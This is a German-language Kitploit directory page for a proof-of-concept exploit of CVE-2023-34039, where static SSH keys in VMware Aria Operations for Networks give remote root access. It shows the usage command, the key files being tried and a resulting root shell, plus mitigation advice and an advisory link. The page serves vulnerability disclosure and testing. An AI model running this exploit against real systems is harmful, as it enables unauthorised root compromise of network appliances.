Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-34039 — VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039) | Kitploit
Tools/GitHubGitHub/sinsinology/cve-2023-34039
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsCloud-SicherheitRemote-Access-Tool
GitHubsinsinology/cve-2023-34039

CVE-2023-34039

VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

Repository anzeigen
9731vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-34039

PoC für CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) RCE über statischen SSH-Schlüssel

Technische Analyse

Eine Root-Cause-Analyse der Schwachstelle finden Sie in meinem Blog:

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

poc

Zusammenfassung

VMWare Aria Operations for Networks (vRealize Network Insight) hat von Version 6.0 bis 6.10 die SSH-Schlüssel für die Benutzer support und ubuntu nicht neu generiert, wodurch ein Angreifer mit SSH-Zugriff Zugriff auf die root-Shell dieses Produkts erlangen konnte.

Dieses Problem wurde VMWare von Harsh Jaiswal (@rootxharsh) und Rahul Maini (@iamnoooob) bei ProjectDiscovery Research gemeldet.

Ich habe nur den Exploit geschrieben, wenn man ihn so nennen kann, denn es ist im Grunde ein SSH-Befehls-Wrapper.

Verwendung

root@kitploit:~
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform

(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform


********************************** ATTENTION **********************************
 NTP Service is not healthy.
 IMPACT: It may affect the proper working of other services.
 ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~# 

Gegenmaßnahmen

Aktualisieren Sie auf die neueste Version oder mildern Sie das Risiko, indem Sie den Anweisungen im Progress Advisory folgen.

  • https://www.vmware.com/security/advisories/VMSA-2023-0018.html

Folgen Sie uns für weitere Sicherheitsforschung:

  • SinSinology
  • SummoningTeam

Haftungsausschluss

Diese Software wurde ausschließlich für Zwecke der akademischen Forschung und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dafür gedacht, Systeme anzugreifen, außer wenn dies ausdrücklich autorisiert ist. Die Projektbetreuer sind nicht verantwortlich oder haftbar für den Missbrauch der Software. Nutzen Sie sie verantwortungsbewusst.

Tool herunterladen